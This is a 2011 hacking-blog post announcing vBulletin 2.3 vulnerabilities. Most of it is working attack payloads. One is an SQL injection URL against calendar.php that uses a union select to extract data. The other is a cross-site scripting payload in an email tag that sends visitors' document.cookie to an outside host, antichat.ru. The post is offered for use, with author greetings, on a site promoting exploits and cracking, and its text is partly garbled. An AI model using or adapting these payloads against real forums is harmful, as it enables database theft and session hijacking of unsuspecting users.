Saturday, August 6, 2011
# Title: vbulletin Vulnerability versions 2.3 .* - SQL injection.
# Author: Discovered by ROOT_EGY |
# Version: vBulletin Version 2.3 |
=========================================================== |
=========================================================== |
Vulnerability
versions 2.3 .* - SQL injection in the validation of input data in
'calendar.php'. Sends SQL requests to the server. |
www.server.som/forumpath/calendar.php?s=&action=edit&eventid=14
union (SELECT allowsmilies, public, userid, '0000-0-0 ', version (),
userid FROM calendar_events WHERE eventid = 14) order by eventdate |
Vulnerability to Version 2 .*.* - is introducing XSS script tag e-mail |
[E
* MAIL] aaa@aaa.aa » 's =' [/ E * MAIL] 'sss =» i = new Image (); i.src
=' http://antichat.ru/cgi-bin/s . jpg? '+ document.cookie; this.sss =
null »style = top: expression (eval (this.sss)); |
=========================================================== |
ROOT_EGY to connect: r0t@hotmail.es |
=========================================================== |
Greetz TO : Alnjm33 - Mr.xXx - EgY-Sn!per - red virus - ShOot3r - And All My Friends. |
===========================================================
- Copyright ©
.Hacking Cracking Tricks And Tutorials, Paid Scripts, Latest Exploits, 0Day Vulnerability, - Skyblue - Powered by Blogger - Designed by Johanes Djogan -
